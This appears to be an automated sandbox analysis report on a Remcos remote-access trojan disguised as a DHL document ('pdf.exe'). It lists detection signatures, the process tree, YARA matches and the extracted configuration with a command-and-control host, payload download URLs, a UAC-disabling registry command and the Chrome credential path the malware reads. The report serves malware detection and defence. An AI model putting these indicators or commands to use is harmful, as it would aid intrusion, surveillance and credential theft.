
Windows Analysis Report ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe

Overview

General Information

Sample Name: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe
Analysis ID: 491719
MD5: 3808d4a11cbee20896cca28f9a3bcb9b
SHA1: b3a533d6e00ace2ec0612c9af66c6dd69c5180b3
SHA256: 53c2e53d33f80e88b16cce06621f99680e0e5f387315cb81af97cee58080165a
Tags: DHL, exe, geo, PRT, RAT, RemcosRAT

Detection

Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Yara detected Remcos RAT
Detected Remcos RAT
Multi AV Scanner detection for dropped file
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Contains functionality to steal Firefox passwords or cookies
Delayed program exit found
Allocates memory in foreign processes
Contains functionality to steal Chrome passwords or cookies
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Uses dynamic DNS services
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to launch and control a shell (cmd.exe)
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
Creates processes with suspicious names
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Entry point lies outside standard sections
Contains long sleeps (>= 3 min)
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
Uses reg.exe to modify the Windows registry
Contains functionality to retrieve information about pressed keystrokes
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Creates a process in suspended mode (likely to inject code)
Contains functionality to simulate mouse events
Contains functionality to read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe (PID: 6548 cmdline: 'C:\Users\user\Desktop\ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 1368 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
    • cmd.exe (PID: 7156 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\Trast.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5192 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 6852 cmdline: C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 1852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • cmd.exe (PID: 5048 cmdline: C:\Windows\system32\cmd.exe /c ''C:\Users\Public\nest.bat' ' MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • reg.exe (PID: 1680 cmdline: reg delete hkcu\Environment /v windir /f MD5: CEE2A7E57DF2A159A065A34913A055C2)
        • conhost.exe (PID: 5508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • Iqzenco.exe (PID: 7112 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • mobsync.exe (PID: 4108 cmdline: C:\Windows\System32\mobsync.exe MD5: 44C19378FA529DD88674BAF647EBDC3C)
  • Iqzenco.exe (PID: 484 cmdline: 'C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe' MD5: 3808D4A11CBEE20896CCA28F9A3BCB9B)
    • secinit.exe (PID: 6644 cmdline: C:\Windows\System32\secinit.exe MD5: 174A363BB5A2D88B224546C15DD10906)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Version": "3.1.5 Pro", "Host:Port:Password": "ongod4ever.ddns.net:5652:0", "Assigned name": "ABLE GOD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VTGWT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Yara Overview

Dropped Files

Source: C:\Users\Public\Libraries\ocnezqI.url
Rule: Methodology_Contains_Shortcut_OtherURIhandlers
Description: Detects possible shortcut usage for .URL persistence
Author: @itsreallynick (Nick Carr)
Strings:
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]

Memory Dumps

Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5f86c:$str_b2: Executing file:
  • 0x60800:$str_b3: GetDirectListeningPort
  • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x603d4:$str_b5: licence_code.txt
  • 0x60278:$str_b7: \update.vbs
  • 0x5f8dc:$str_b9: Downloaded file:
  • 0x5f8a8:$str_b10: Downloading file:
  • 0x5f890:$str_b12: Failed to upload file:
  • 0x607c8:$str_b13: StartForward
  • 0x607e8:$str_b14: StopForward
  • 0x60220:$str_b15: fso.DeleteFile "
  • 0x601b4:$str_b16: On Error Resume Next
  • 0x60250:$str_b17: fso.DeleteFolder "
  • 0x5f880:$str_b18: Uploaded file:
  • 0x5f91c:$str_b19: Unable to delete:
  • 0x601e8:$str_b20: while fso.FileExists("

Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5f86c:$str_b2: Executing file:
  • 0x60800:$str_b3: GetDirectListeningPort
  • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x603d4:$str_b5: licence_code.txt
  • 0x60278:$str_b7: \update.vbs
  • 0x5f8dc:$str_b9: Downloaded file:
  • 0x5f8a8:$str_b10: Downloading file:
  • 0x5f890:$str_b12: Failed to upload file:
  • 0x607c8:$str_b13: StartForward
  • 0x607e8:$str_b14: StopForward
  • 0x60220:$str_b15: fso.DeleteFile "
  • 0x601b4:$str_b16: On Error Resume Next
  • 0x60250:$str_b17: fso.DeleteFolder "
  • 0x5f880:$str_b18: Uploaded file:
  • 0x5f91c:$str_b19: Unable to delete:
  • 0x601e8:$str_b20: while fso.FileExists("

Source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

(10 further memory dump entries are not shown in this extract.)

Unpacked PEs

Source: 22.2.mobsync.exe.50601a02.1.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 22.2.mobsync.exe.50601a02.1.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x5d2bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x5d238:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5d238:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5c838:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x5ce90:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5c46c:$str_b2: Executing file:
  • 0x5d400:$str_b3: GetDirectListeningPort
  • 0x5cc50:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x5cfd4:$str_b5: licence_code.txt
  • 0x5ce78:$str_b7: \update.vbs
  • 0x5c4dc:$str_b9: Downloaded file:
  • 0x5c4a8:$str_b10: Downloading file:
  • 0x5c490:$str_b12: Failed to upload file:
  • 0x5d3c8:$str_b13: StartForward
  • 0x5d3e8:$str_b14: StopForward
  • 0x5ce20:$str_b15: fso.DeleteFile "
  • 0x5cdb4:$str_b16: On Error Resume Next
  • 0x5ce50:$str_b17: fso.DeleteFolder "
  • 0x5c480:$str_b18: Uploaded file:
  • 0x5c51c:$str_b19: Unable to delete:
  • 0x5cde8:$str_b20: while fso.FileExists("

Source: 5.2.mobsync.exe.400000.0.raw.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

Source: 5.2.mobsync.exe.400000.0.raw.unpack
Rule: REMCOS_RAT_variants
Description: unknown
Author: unknown
Strings:
  • 0x606bc:$str_a1: C:\Windows\System32\cmd.exe
  • 0x60638:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x60638:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x5fc38:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x60290:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x5f86c:$str_b2: Executing file:
  • 0x60800:$str_b3: GetDirectListeningPort
  • 0x60050:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x603d4:$str_b5: licence_code.txt
  • 0x60278:$str_b7: \update.vbs
  • 0x5f8dc:$str_b9: Downloaded file:
  • 0x5f8a8:$str_b10: Downloading file:
  • 0x5f890:$str_b12: Failed to upload file:
  • 0x607c8:$str_b13: StartForward
  • 0x607e8:$str_b14: StopForward
  • 0x60220:$str_b15: fso.DeleteFile "
  • 0x601b4:$str_b16: On Error Resume Next
  • 0x60250:$str_b17: fso.DeleteFolder "
  • 0x5f880:$str_b18: Uploaded file:
  • 0x5f91c:$str_b19: Unable to delete:
  • 0x601e8:$str_b20: while fso.FileExists("

Source: 26.2.secinit.exe.400000.0.unpack
Rule: JoeSecurity_Remcos
Description: Yara detected Remcos RAT
Author: Joe Security

(19 further unpacked PE entries are not shown in this extract.)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 22.2.mobsync.exe.400000.0.unpack; Malware Configuration Extractor: Remcos {"Version": "3.1.5 Pro", "Host:Port:Password": "ongod4ever.ddns.net:5652:0", "Assigned name": "ABLE GOD", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-8VTGWT", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
Multi AV Scanner detection for submitted file
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; Virustotal: Detection: 26%
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; ReversingLabs: Detection: 24%
Yara detected Remcos RAT
Source: Yara match; File source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR
Multi AV Scanner detection for dropped file
Source: C:\Users\Public\Libraries\Iqzenco\Iqzenco.exe; ReversingLabs: Detection: 24%

Source: mobsync.exe; Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 5_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 5_2_00406176 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004170AC FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_00406176 FindFirstFileW,FindNextFileW,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_0040A3AF FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_0040A5CA FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004456A9 FindFirstFileExA,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004077EE __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_00406930 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: ongod4ever.ddns.net
Uses dynamic DNS services
Source: unknown; DNS query: name: ongod4ever.ddns.net

Source: global traffic; TCP traffic: 192.168.2.4:49771 -> 185.140.53.15:5652
Source: Iqzenco.exe, 00000010.00000003.750864485.00000000007B1000.00000004.00000001.sdmp; String found in binary or memory: https://bl30uw.sn.files.1drv.com/y4mGst0byrg6Ub0CK8iKHaximJI4M7D1uUmqxfl02ZpIfKXbkyeYXQLL6P2J6UxS4Yz
Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp; String found in binary or memory: https://bl30uw.sn.files.1drv.com/y4maOmpRLgEZgKpnLv-hczrMb96VqtMQDZd-m0g51QRpK-v8c65WYNUi2NOLDdGNQiU
Source: Iqzenco.exe, 00000010.00000003.750846747.00000000007A3000.00000004.00000001.sdmp; String found in binary or memory: https://bl30uw.sn.files.1drv.com/y4msI7_EyjC8cs97rdyt7ReCTl2WoedGiqx9hVOiugfpodFj4cXgoX5lAQfrGe41zrt
Source: Iqzenco.exe, 00000010.00000003.752060770.00000000007A3000.00000004.00000001.sdmp; String found in binary or memory: https://onedrive.live.com/download?cid=97429F42E815B766&resid=97429F42E815B766%21166&authkey=AFRFbbm
Source: unknown; DNS traffic detected: queries for: onedrive.live.com
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_0041242F Sleep,URLDownloadToFileW,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004089BC GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,
Source: C:\Windows\SysWOW64\mobsync.exe; Code function: 22_2_004126A5 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

E-Banking Fraud:

Yara detected Remcos RAT
Source: Yara match; File source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.938674908.0000000002EA7000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.827146573.0000000003178000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.939914286.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000016.00000002.827407780.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.851109980.0000000050601000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 0000001A.00000002.850918949.0000000003327000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: mobsync.exe PID: 1368, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: mobsync.exe PID: 4108, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: secinit.exe PID: 6644, type: MEMORYSTR

System Summary:

Malicious sample detected (through community Yara rule)
Source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants Author: unknown
Initial sample is a PE file and has a suspicious name
Source: initial sample; Static PE information: Filename: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe

Source: ENTREGA DE DOCUMENTOS DHL _ 27-09-21,pdf.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
Matched rule: REMCOS_RAT_variants (Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda) for each of the following sources:
Source: 22.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: 5.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 26.2.secinit.exe.400000.0.unpack, type: UNPACKEDPE
Source: 5.2.mobsync.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: 26.2.secinit.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: 5.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: 26.2.secinit.exe.50601a02.1.unpack, type: UNPACKEDPE
Source: 5.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: 22.2.mobsync.exe.400000.0.unpack, type: UNPACKEDPE
Source: 26.2.secinit.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 22.2.mobsync.exe.50601a02.1.raw.unpack, type: UNPACKEDPE
Source: 22.2.mobsync.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: 00000005.00000002.937782591.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: 0000001A.00000002.850111414.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: C:\Users\Public\Libraries\ocnezqI.url, type: DROPPEDMatched rule: Methodology_Contains_Shortcut_OtherURIhandlers author = @itsreallynick (Nick Carr), description = Detects possible shortcut usage for .URL persistence, reference = https://twitter.com/cglyer/status/1176184798248919044, score = 27.09.2019
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_00412598 ExitWindowsEx,LoadLibraryA,GetProcAddress,
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042E02D
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_004330D1
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0043424F
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0042220F
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 5_2_0041A3F8
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042E02D
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004330D1
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0043424F
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0042220F
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0041A3F8
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004304DB
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0044C56A
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004335CD
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0043E6E0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_0044A725
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004378EC
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004228AD
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004339E5
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: 22_2_004229F0
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 0042EDF6 appears 64 times
Source: C:\Windows\SysWOW64\mobsync.exe | Code function: String function: 00402064 appears 87 times
